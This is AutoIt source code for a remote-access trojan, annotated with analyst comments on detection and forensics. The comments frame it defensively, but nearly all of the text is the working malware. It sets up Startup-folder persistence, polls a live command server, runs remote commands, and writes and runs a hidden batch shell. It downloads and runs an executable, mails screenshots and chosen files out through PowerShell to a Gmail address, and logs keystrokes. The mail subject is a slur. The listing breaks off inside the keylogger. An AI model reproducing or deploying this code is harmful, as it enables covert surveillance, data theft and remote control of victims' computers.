- #include <InetConstants.au3>
- #include <MsgBoxConstants.au3>
- #include <WinAPIFiles.au3>
- #include <Misc.au3>
- #include <WindowsConstants.au3>
- #include <AutoItConstants.au3>
- #include <ScreenCapture.au3>
- ;this is the client side version of a silly rat i am working on
- ; Analyst note: start-up section of a remote-access tool written in AutoIt. It sets the
- ; file name it expects for its own copy, installs a logon-persistence copy, and
- ; initialises the state used by the command loop that follows.
- Global $exename = "ratattempt.exe"
- ;stage will control what the rat is doing locally, for example. stage 0 is look for instructions
- ; Persistence: when no file named $exename exists in the current user's Startup folder,
- ; the running file (@ScriptFullPath) is copied into that folder, so it is started again
- ; at the next logon. FileCopy is given only the folder, so the copy keeps the running
- ; file's current name. Detection: new executables appearing in the per-user Startup folder.
- If Not FileExists(@StartupDir & "/" & $exename) Then
- FileCopy(@ScriptFullPath, @StartupDir)
- EndIf
- Global $herenum = 0 ; for use in hiddenshell
- ; Command server base URL (plain HTTP). The requests visible in this listing spell the
- ; full URL out literally instead of reading $sURL.
- Global $sURL = 'http://isavigualco.000webhostapp.com/'
- ; $num is appended to every request as the value of an unnamed query parameter
- ; ("index.php?=" & $num) and is incremented between requests.
- Global $num = 1
- ; $stage selects which of the While($stage == N) loops below runs; 0 = poll for a command.
- Global $stage = 0
- While(BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "keylog")
- ;While (true)
- ;rat must get instructions
- Sleep(4000)
- ; Analyst note: stage 0 is the command dispatcher. Each check fetches the server page
- ; with the current $num, compares the response body (case-sensitively, ==) with one
- ; fixed command word and, on a match, stores the matching stage number. $num is
- ; incremented after every check, so every request carries a different counter value.
- ; Command word -> stage: instructions=-1, keylog=1, cmd=2, printscreen=3, kill=4,
- ; troll=5, obliterate=6, flipout=7, closecommonapps=8, hiddenshell=9, download=10,
- ; hprintscreen=11, upload=12.
- ; Detection: bursts of unauthenticated plain-HTTP GETs to index.php?=<incrementing integer>
- ; from one workstation; the command words travel in clear text in the response bodies.
- while ($stage == 0);read commands
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "instructions" Then
- $stage = -1;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "keylog" Then
- $stage = 1;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "cmd" Then
- $stage = 2;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "printscreen" Then
- $stage = 3;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- $stage = 4;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "troll" Then
- $stage = 5;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- $stage = 6;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "flipout" Then
- $stage = 7;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "closecommonapps" Then
- $stage = 8;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "hiddenshell" Then
- $stage = 9;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "download" Then
- $stage = 10;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "hprintscreen" Then
- $stage = 11;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "upload" Then
- $stage = 12;
- EndIf
- $num = $num + 1
- WEnd
- ; Analyst note: stage 2 ("cmd"). A visible cmd.exe is started and text fetched from the
- ; server is typed with Send(), which delivers keystrokes to whichever window has focus,
- ; followed by ENTER. Further lines are fetched and typed until the server answers
- ; "returnzero"; cmd.exe is then closed and the stage is reset to 0.
- ; Detection: the remote text never appears as a process argument (cmd.exe is started
- ; bare), so process-creation logging alone presumably shows only "cmd.exe" and its
- ; children; correlate with the HTTP polling and with cmd.exe spawned by this binary.
- While($stage == 2);cmd
- If _Singleton("cmd.exe") <> 0 Then
- Run("cmd.exe")
- EndIf
- ;Run( @startupdir & "/" & $exename)
- Sleep(30000)
- ; Starts the copy in the Startup folder as a separate process.
- Run( @startupdir & "/" & $exename)
- $num = $num + 1
- ; $cmdline holds the raw response body; it is typed as-is, with no validation.
- Global $cmdline = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
- $num = $num + 1
- Send($cmdline)
- Send("{ENTER}")
- While BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "returnzero"
- $num = $num + 1
- $cmdline = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
- Sleep(10000)
- Send($cmdline)
- Send("{ENTER}")
- WEnd
- $num = $num + 1
- If _Singleton("cmd.exe") = 0 Then
- ProcessClose ( "cmd.exe" )
- EndIf
- $stage = 0
- WEnd
- ; Analyst note: stage 3 ("printscreen"). Captures the screen to
- ; <Documents>\GDIPlus_Image1.jpg and mails it out as an attachment by typing a
- ; Send-MailMessage command into PowerShell (SMTP submission to smtp.gmail.com, port 587).
- ; The two SendMessage calls pass message 274 with wParam 61808 to the Progman window;
- ; these values look like WM_SYSCOMMAND / SC_MONITORPOWER (lParam 2 = display off,
- ; -1 = display on) - confirm against the Windows headers.
- ; Detection: GDIPlus_Image1.jpg appearing in the Documents folder; powershell.exe started
- ; from cmd.exe on a workstation followed by an outbound connection to port 587.
- While ($stage == 3);printscreen
- Local $hDLL = DllOpen("USER32.dll")
- DllCall($hDLL, "int", "SendMessage", "hwnd", WinGetHandle("classname=Progman"), "int", 274, "int", 61808, "int", 2);
- _ScreenCapture_Capture(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
- $num = $num + 1
- While($stage = 3)
- ; Two mouse positions are sampled 30 s apart and compared; the mail branch runs only when
- ; they compare equal (apparently so the typed commands are sent while the user is idle).
- Global $mouseposition = MouseGetPos()
- Sleep(30000)
- Global $mousepositios = MouseGetPos()
- if $mouseposition == $mousepositios Then
- Sleep(3000)
- Run("cmd.exe")
- Sleep(1000)
- Send("Start Powershell")
- Send("{ENTER}")
- Sleep(7000)
- ; The mail command is assembled by typing it piece by piece into the focused window.
- Send("Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- ;FileClose($file)
- Send(" -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- Send(" -Attachments ")
- Send(@MyDocumentsDir)
- Send("\GDIPlus_Image1.jpg")
- ;Send($date)
- ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- Send("{ENTER}")
- Sleep(2000)
- ; Text typed in answer to the credential prompt that -Credential raises.
- Send("pass");
- Send("{ENTER}")
- ;FileOpen($log)
- Sleep(60000)
- ProcessClose("cmd.exe")
- ProcessClose("Powershell.exe")
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- Sleep(30000)
- EndIf
- $stage = 0;
- WEnd
- DllCall($hDLL, "int", "SendMessage", "hwnd", WinGetHandle("classname=Progman"), "int", 274, "int", 61808, "int", -1)
- Wend
- ; Analyst note: stage 4 ("kill"). Closes cmd.exe, powershell.exe and the process named
- ; $exename, then exits with code 0. Nothing is deleted here, so the Startup-folder copy
- ; made at start-up is left in place.
- While($stage == 4);kill
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- ProcessClose($exename)
- Exit 0
- Wend
- ; Analyst note: stage 5 ("troll"). Types the letter "e" into the focused window every
- ; 10 s and polls the server after each keystroke; "returnzero" ends the stage.
- While($stage == 5);troll
- Send("e")
- Sleep(10000)
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- $num = $num + 1
- WEnd
- ; Analyst note: stage 6 ("obliterate") is the self-removal routine. It closes cmd.exe and
- ; powershell.exe, deletes the Startup-folder copy, <Temp>\setup.exe (the stage 10 download
- ; target) and <Temp>/testandofileopen.bat (the stage 9 batch file), and closes the process
- ; named $exename.
- ; Forensics: after this runs the on-disk artefacts listed above are gone; evidence then
- ; has to come from sources this code does not touch (network logs, process-creation
- ; telemetry, file-system journals).
- While($stage == 6);obliterate
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- FileDelete(@StartupDir & "/" & $exename)
- FileDelete(@TempDir & "\setup.exe")
- FileDelete(@TempDir & "/testandofileopen.bat", $FO_APPEND)
- ProcessClose($exename)
- FileDelete(@TempDir & "\setup.exe")
- WEnd
- ; Analyst note: stage 7 ("flipout"). A nuisance routine: on each pass, with a random
- ; draw above 7 out of 0..10, it sends Ctrl+Alt+Down and, on a second draw, Ctrl+Alt+Del
- ; as simulated key presses. It then polls the server for "returnzero", "kill" or
- ; "obliterate" and switches stage accordingly.
- While($stage == 7);flipout
- Sleep(3000)
- if Random(0,10,1) > 7 Then
- Send("{CTRLDOWN}")
- Send("{ALTDOWN}")
- Send("{DOWN}")
- Send("{ALTUP}")
- Send("{CTRLUP}")
- Endif
- $num = $num + 1
- Sleep(3000)
- if Random(0,10,1) > 7 Then
- Send("{CTRLDOWN}")
- Send("{ALTDOWN}")
- Send("{DEL}")
- Send("{ALTUP}")
- Send("{CTRLUP}")
- Endif
- Sleep(3000)
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- $stage = 4;
- EndIf
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- $stage = 6;
- EndIf
- WEnd
- ; Analyst note: stage 8 ("closecommonapps"). Repeatedly closes common user applications
- ; by process name (chrome.exe, iexplore.exe, winword.exe, powerpnt.exe, firefox.exe,
- ; mspaint.exe, notepad.exe, plus cmd.exe), polling the server between groups for
- ; "returnzero", "kill" or "obliterate".
- ; Detection: the same non-system process terminating several unrelated user applications
- ; in quick succession.
- While($stage == 8);closeapps
- If _Singleton("cmd.exe") = 0 Then
- ProcessClose ( "cmd.exe" )
- EndIf
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- $num = $num + 1
- ProcessClose("chrome.exe")
- ;ProcessClose("chrome.exe")
- ;iexplore.exe
- ProcessClose("iexplore.exe" )
- ProcessClose("winword.exe" )
- ProcessClose("powerpnt.exe")
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- $stage = 4;
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- $stage = 6;
- EndIf
- ProcessClose("firefox.exe")
- ProcessClose("mspaint.exe")
- ProcessClose("notepad.exe")
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- WEnd
- ; Analyst note: stage 9 ("hiddenshell"). Response bodies from the server are appended,
- ; one per line, to <Temp>/testandofileopen.bat until the server answers "close"; the
- ; handle is then closed and a batch file is started through the WScript.Shell COM object
- ; with window style 0 (no visible window). The Run call uses the literal path shown
- ; below rather than @TempDir.
- ; Detection: a .bat file created or modified in the user's temp folder by a non-installer
- ; process, followed by a windowless cmd.exe child; the file content is attacker-supplied
- ; and is written without any validation.
- While($stage == 9);HIDDENSHELL
- Sleep(12000)
- ; $herenum is a first-pass flag: the COM objects and the file handle are created only
- ; while it is 0, and it is reset to 0 once the batch file has been run.
- if $herenum = 0 then
- Local $oShell = ObjCreate("shell.application")
- $herenum = $herenum + 1
- $ShellObj=ObjCreate("WScript.Shell")
- $file = FileOpen(@TempDir & "/testandofileopen.bat", $FO_APPEND)
- Endif
- $num = $num + 1
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "close" Then
- FileWriteLine($file,BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) )
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "close" Then
- FileClose($file)
- $num = $num + 1
- $ShellObj.Run("C://temp/testandofileopen.bat", 0)
- $num = $num + 1
- $ShellObj = Null
- $herenum = 0;
- $num = $num + 1
- EndIf
- sleep(5000)
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0
- EndIf
- WEnd
- ; Analyst note: stage 10 ("download and run"). The response body is used as a URL; the
- ; file behind it is saved as <Temp>\Setup.exe and started with ShellExecute. Nothing in
- ; this block checks the URL, the file's origin, its hash or its signature. The stage is
- ; reset to 0 after one pass.
- ; Detection / mitigation: an executable written to the user's temp folder and executed by
- ; the process that wrote it; application-control rules that deny execution from
- ; user-writable temp locations stop this step.
- While($stage == 10);Download and run
- Sleep(30000)
- Local $FileURL = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
- Local $FileName = @TempDir & "\Setup.exe"
- ;$FileSaveLocation = FileSaveDialog("Save Location...",@ScriptDir,"All (*.*)",18,$FileName)
- $FileSize = InetGetSize($FileURL)
- InetGet($FileURL,$FileName,0,1)
- ; Progress-reporting loop that runs while the download is active.
- While @InetGetActive
- $Percentage = @InetGetBytesRead * 100 / $FileSize
- ProgressSet($Percentage,"Downloaded " & @InetGetBytesRead & " of " & $FileSize & " bytes","Downloading " & $FileName)
- Sleep(250)
- Wend
- ProgressOff()
- ShellExecute (@TempDir & "\setup.exe") ; you may use Run (), RunWait () or ShellExecuteWait depending on setup.exe
- ;If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0
- ;EndIf
- WEnd
- ; Analyst note: stage 11 ("hprintscreen") is the hidden variant of stage 3. The screenshot
- ; is again written to <Documents>\GDIPlus_Image1.jpg, but PowerShell is started directly,
- ; its window is hidden with @SW_HIDE, and the mail command is delivered with ControlSend
- ; to the window titled "Windows PowerShell". The credential prompt is located by a
- ; Portuguese window title, so this path depends on the Windows display language.
- ; The screenshot is deleted after the send attempt.
- ; Detection: powershell.exe started by this binary with a hidden window, then an outbound
- ; connection to smtp.gmail.com on port 587; short-lived GDIPlus_Image1.jpg in Documents.
- While($stage == 11);hprintscreen
- ; Run('calc')
- ;Sleep(1000)
- ;WinWait('Calculator')
- ;Sleep(1000) ; Hide window with next line
- ;WinSetState('Calculator', '', @SW_HIDE)
- ;ControlClick('Calculator', '', '6')
- ;ControlClick('Calculator', '', '+')
- ;ControlClick('Calculator', '', '6')
- ;ControlClick('Calculator', '', '=')
- ;Sleep(1000) ; Show window with next line
- ;WinSetState('Calculator', '', @SW_SHOW)
- _ScreenCapture_Capture(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
- $num = $num + 1
- While($stage = 11)
- ; Two mouse positions sampled 30 s apart; the mail branch runs when they compare equal.
- Global $mouseposition = MouseGetPos()
- Sleep(30000)
- Global $mousepositios = MouseGetPos()
- if $mouseposition == $mousepositios Then
- Sleep(3000)
- Run("powershell.exe")
- WinWait("Windows PowerShell")
- WinSetState("Windows PowerShell", "", @SW_HIDE)
- ;Send("Start Powershell")
- ;Send("{ENTER}")
- ;Sleep(7000)
- ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- ;FileClose($file)
- ControlSend("Windows PowerShell","", ""," -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- ControlSend("Windows PowerShell","", ""," -Attachments ")
- ControlSend("Windows PowerShell","", "",@MyDocumentsDir)
- ControlSend("Windows PowerShell", "","","\GDIPlus_Image1.jpg")
- ;Send($date)
- ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- ControlSend("Windows PowerShell","", "","{ENTER}")
- ;Sleep(2000);Solicitação de credenciais do Windows PowerShell
- ; The credential prompt is hidden as soon as it appears and answered by ControlSend.
- WinWait("Solicitação de credenciais do Windows PowerShell")
- WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
- ;FileOpen($log)
- Sleep(60000)
- ProcessClose("cmd.exe")
- ProcessClose("Powershell.exe")
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- Sleep(30000)
- FileDelete(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
- EndIf
- $stage = 0;
- WEnd
- WEnd
- ; Analyst note: stage 12 ("upload") exfiltrates a file chosen by the server. The response
- ; body is treated as a local path; if that path exists, a hidden PowerShell window is
- ; driven with ControlSend to mail it out, and the attachment path typed into the command
- ; is read from the server again after $num has been incremented. Any file readable by
- ; the logged-on user can be named.
- ; Detection: hidden powershell.exe spawned by this binary plus outbound SMTP submission
- ; (port 587) from a workstation; egress filtering of direct SMTP from user endpoints
- ; blocks this channel.
- While($stage == 12);upload
- Sleep(12000)
- $num = $num + 1
- If FileExists(BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))) Then
- Sleep(3000)
- Run("powershell.exe")
- WinWait("Windows PowerShell");dir<carpeta> >> files.txt
- WinSetState("Windows PowerShell", "", @SW_HIDE)
- $num = $num + 1
- ;Send("Start Powershell")
- ;Send("{ENTER}")
- ;Sleep(7000)
- ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- ;FileClose($file)
- ControlSend("Windows PowerShell","", ""," -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- ControlSend("Windows PowerShell","", ""," -Attachments ")
- ControlSend("Windows PowerShell","", "",BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)))
- ;ControlSend("Windows PowerShell", "","","\GDIPlus_Image1.jpg")
- ;Send($date)
- ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- ControlSend("Windows PowerShell","", "","{ENTER}")
- ;Sleep(2000);Solicitação de credenciais do Windows PowerShell
- WinWait("Solicitação de credenciais do Windows PowerShell")
- WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
- ;FileOpen($log)
- Sleep(60000)
- ProcessClose("cmd.exe")
- ProcessClose("Powershell.exe")
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- EndIf
- WEnd
- WEnd
- ;While($stage == 1);Keylogger
- ;======================================== Variables ============================================
- ; Analyst note: set-up for the keystroke-logging part. It opens a handle to user32.dll,
- ; creates a "log" directory next to the running file and opens
- ; log\logfiles<YYYYMMDD>.htm with mode 1+256, then writes an HTML font tag as the
- ; first output.
- ; Forensics: a "log" folder holding logfiles<date>.htm beside the executable is the
- ; on-disk artefact of this stage; captured keystrokes are stored there unencrypted.
- $hDll=DllOpen("user32.dll")
- $window2=""
- Global $date=@year&@mon&@mday
- $log=@ScriptDir&"/log"; path to the log directory
- $keystroke=""
- ;$hexKey = '0x' & $hexKey
- ;===============================================================================================
- ;======================================== Directory ============================================
- DirCreate ($log)
- $file = FileOpen($log&"\logfiles"&$date&".htm", 1+256) ; create the log that stores the captured content (UTF-8)
- If $file = -1 Then ; exit if the log cannot be opened
- Exit
- EndIf
- filewrite($file,'<font face=Verdana size=1>')
- ;Send-MailMessage -To $to -From $MyEmail -Subject $Subject -Body $Body -SmtpServer $SMTP -Credential (Get-Credential -Credential "$MyEmail")
- ;-UseSsl -Port 587 -DeliveryNotificationOption never
- ;===============================================================================================
- ; terminate(): closes the user32.dll handle held in $hDll and ends the process with
- ; exit code 0. Takes no parameters and does not return.
- Func terminate()
- DllClose($hDll)
- Exit 0
- EndFunc
- ;Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body body -SmtpServer smtp.gmail.com -Credential (Get-Credential -Credential "isavigualco@gmail.com")-UseSsl -Port 587 -DeliveryNotificationOption never
- ;======================================== LogWrite ============================================
- ; _LogKeyPress($what2log): appends one captured key label to the open log file.
- ;   $what2log - text to record for the key (a character or a label such as "{ENTER}").
- ; The title of the active window is compared with the last one seen ($window2). While it
- ; is unchanged only the key text is written. When it changes, $window2 is updated and a
- ; header is built from the current date, time and window title; the FileWrite calls in
- ; that branch sit inside the four application checks below (Yahoo! Messenger, Google
- ; Chrome, Mozilla Firefox, Windows Internet Explorer), each adding an <img> tag.
- ; Forensics: the log therefore ties typed text to window titles and timestamps, which
- ; helps scope what was exposed on an affected host.
- Func _LogKeyPress($what2log)
- $window=WinGetTitle("")
- Switch $window
- Case $window2
- FileWrite($file,$what2log)
- Sleep(100)
- Case Else
- $window2=$window
- $main="<b>["& @Year&"."&@mon&"."&@mday&" "&@HOUR & ":" &@MIN & ":" &@SEC & '] Window: "'& $window& '"</b></br>'& $what2log
- If $window="Yahoo! Messenger" then
- FileWrite($file, '<br><BR><img src="yahoo.png" width=30 height=30>' & $main)
- ElseIf StringInStr($window,"Google Chrome") then
- FileWrite($file, '<br><BR><img src="chrome.png" width=30 height=30>' & $main)
- ElseIf StringInStr($window,"Mozilla Firefox") then
- FileWrite($file, '<br><BR><img src="Firefox.png" width=30 height=30>' & $main)
- ElseIf StringInStr($window,"Windows Internet Explorer") then
- FileWrite($file, '<br><BR><img src="IE.png" width=30 height=30>' & $main)
- EndIf ; sets an icon for some common programs so the log is easier to follow
- sleep (100)
- EndSwitch
- EndFunc
- ;===============================================================================================
- $Dllcall = DllOpen("user32.dll")
- ;Call DLL d? s? d?ng hàm _IsPressed là hàm chính c?a keylogger
- ;======================================== Alphabets ============================================
- While 1
- If _IsPressed('6A',$Dllcall) Then
- local $a
- $a=terminate()
- EndIf
- If _IsPressed(41,$Dllcall) Then ;if return 1
- _LogKeyPress("a")
- EndIf
- If _IsPressed(42,$Dllcall) Then
- _LogKeyPress("b")
- EndIf
- If _IsPressed(43,$Dllcall) Then
- _LogKeyPress("c")
- EndIf
- If _IsPressed(44,$Dllcall) Then
- _LogKeyPress("d")
- EndIf
- If _IsPressed(45,$Dllcall) Then
- _LogKeyPress("e")
- EndIf
- If _IsPressed(46,$Dllcall) Then
- _LogKeyPress("f")
- EndIf
- If _IsPressed(47,$Dllcall) Then
- _LogKeyPress("g")
- EndIf
- If _IsPressed(48,$Dllcall) Then
- _LogKeyPress("h")
- EndIf
- If _IsPressed(49,$Dllcall) Then
- _LogKeyPress("i")
- EndIf
- If _IsPressed('4a',$Dllcall) Then
- _LogKeyPress("j")
- EndIf
- If _IsPressed('4b',$Dllcall) Then
- _LogKeyPress("k")
- EndIf
- If _IsPressed('4c',$Dllcall) Then
- _LogKeyPress("l")
- EndIf
- If _IsPressed('4d',$Dllcall) Then
- _LogKeyPress("m")
- EndIf
- If _IsPressed('4e',$Dllcall) = 1 Then
- _LogKeyPress("n")
- EndIf
- If _IsPressed('4f',$Dllcall) Then
- _LogKeyPress("o")
- EndIf
- If _IsPressed(50,$Dllcall) Then
- _LogKeyPress("p")
- EndIf
- If _IsPressed(51,$Dllcall) Then
- _LogKeyPress("q")
- EndIf
- If _IsPressed(52,$Dllcall) Then
- _LogKeyPress("r")
- EndIf
- If _IsPressed(53,$Dllcall) Then
- _LogKeyPress("s")
- EndIf
- If _IsPressed(54,$Dllcall) Then
- _LogKeyPress("t")
- EndIf
- If _IsPressed(55,$Dllcall) Then
- _LogKeyPress("u")
- EndIf
- If _IsPressed(56,$Dllcall) Then
- _LogKeyPress("v")
- EndIf
- If _IsPressed(57,$Dllcall) Then
- _LogKeyPress("w")
- EndIf
- If _IsPressed(58,$Dllcall) Then
- _LogKeyPress("x")
- EndIf
- If _IsPressed(59,$Dllcall) Then
- _LogKeyPress("y")
- EndIf
- If _IsPressed('5a',$Dllcall) Then
- _LogKeyPress("z")
- EndIf
- ;========================================================================================
- ;=================================== Numbers ===========================================
- If _IsPressed('30',$Dllcall) Then
- _LogKeyPress("0")
- EndIf
- If _IsPressed('31',$Dllcall) Then
- _LogKeyPress("1")
- EndIf
- If _IsPressed('32',$Dllcall) Then
- _LogKeyPress("2")
- EndIf
- If _IsPressed('33',$Dllcall) Then
- _LogKeyPress("3")
- EndIf
- If _IsPressed('34',$Dllcall) Then
- _LogKeyPress("4")
- EndIf
- If _IsPressed('35',$Dllcall) Then
- _LogKeyPress("5")
- EndIf
- If _IsPressed('36',$Dllcall) Then
- _LogKeyPress("6")
- EndIf
- If _IsPressed('37',$Dllcall) Then
- _LogKeyPress("7")
- EndIf
- If _IsPressed('38',$Dllcall) Then
- _LogKeyPress("8")
- EndIf
- If _IsPressed('39',$Dllcall) Then
- _LogKeyPress("9")
- EndIf
- ;===================================================================================
- ;=================================== Keystrokes ====================================
- If _IsPressed('20',$Dllcall) Then
- _LogKeyPress(" ")
- EndIf
- If _IsPressed('08',$Dllcall) Then
- _LogKeyPress("{BACKSPACE}")
- EndIf
- If _IsPressed('09',$Dllcall) Then
- _LogKeyPress("{TAB}")
- EndIf
- If _IsPressed('0d',$Dllcall) Then
- _LogKeyPress("{ENTER}")
- EndIf
- If _IsPressed('10',$Dllcall) Then
- _LogKeyPress("{SHIFT}")
- While _IsPressed("10")
- If _IsPressed('BA',$Dllcall) Then
- _LogKeyPress(";")
- ElseIf _IsPressed('BB',$Dllcall) Then
- _LogKeyPress("+")
- ElseIf _IsPressed('BC',$Dllcall) Then
- _LogKeyPress("<")
- ElseIf _IsPressed('BD',$Dllcall) Then
- _LogKeyPress("_")
- ElseIf _IsPressed('BE',$Dllcall) Then
- _LogKeyPress(">")
- ElseIf _IsPressed('BF',$Dllcall) Then
- _LogKeyPress("?")
- ElseIf _IsPressed('DB',$Dllcall) Then
- _LogKeyPress("{")
- ElseIf _IsPressed('DC',$Dllcall) Then
- _LogKeyPress("|")
- ElseIf _IsPressed('DD',$Dllcall) Then
- _LogKeyPress("}")
- ElseIf _IsPressed('30',$Dllcall) Then
- _LogKeyPress(")")
- ElseIf _IsPressed('31',$Dllcall) Then
- _LogKeyPress("!")
- ElseIf _IsPressed('32',$Dllcall) Then
- _LogKeyPress("@")
- ElseIf _IsPressed('33',$Dllcall) Then
- _LogKeyPress("#")
- ElseIf _IsPressed('34',$Dllcall) Then
- _LogKeyPress("$")
- ElseIf _IsPressed('35',$Dllcall) Then
- _LogKeyPress("%")
- ElseIf _IsPressed('36',$Dllcall) Then
- _LogKeyPress("^")
- ElseIf _IsPressed('37',$Dllcall) Then
- _LogKeyPress("&")
- ElseIf _IsPressed('38',$Dllcall) Then
- _LogKeyPress("*")
- ElseIf _IsPressed('39',$Dllcall) Then
- _LogKeyPress("(")
- EndIf
- Sleep(10) ; important to prevent 100% CPU usage in this tight little loop
- WEnd
- EndIf
- If _IsPressed('14',$Dllcall) Then
- _LogKeyPress("{CAPSLOCK}")
- EndIf
- If _IsPressed('1b',$Dllcall) Then
- _LogKeyPress("{ESC}")
- EndIf
- If _IsPressed('23',$Dllcall) Then
- _LogKeyPress("{END}")
- EndIf
- If _IsPressed('24',$Dllcall) Then
- _LogKeyPress("{HOME}")
- EndIf
- If _IsPressed('25',$Dllcall) Then
- _LogKeyPress("{LEFT ARROW}")
- EndIf
- If _IsPressed('26',$Dllcall) Then
- _LogKeyPress("{UP ARROW}")
- EndIf
- If _IsPressed('27',$Dllcall) Then
- _LogKeyPress("{RIGHT ARROW}")
- EndIf
- If _IsPressed('28',$Dllcall) Then
- _LogKeyPress("{DOWN ARROW}")
- EndIf
- If _IsPressed('2e',$Dllcall) Then
- _LogKeyPress("{DEL}")
- EndIf
- If _IsPressed('BA',$Dllcall) Then
- _LogKeyPress(";")
- EndIf
- If _IsPressed('BB',$Dllcall) Then
- _LogKeyPress("=")
- Mail()
- EndIf
- If _IsPressed('BC',$Dllcall) Then
- _LogKeyPress(",")
- EndIf
- If _IsPressed('BD',$Dllcall) Then
- _LogKeyPress("-")
- EndIf
